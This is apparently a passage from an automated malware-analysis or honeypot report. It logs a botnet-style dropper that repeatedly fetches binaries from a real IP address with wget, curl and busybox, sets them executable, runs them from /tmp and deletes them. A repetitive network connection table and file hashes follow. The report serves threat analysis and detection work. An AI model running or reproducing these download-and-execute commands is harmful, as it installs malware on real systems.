/usr/bin/wget
[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/chmod
[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/rm
[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/wget
[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/chmod
[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/rm
[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |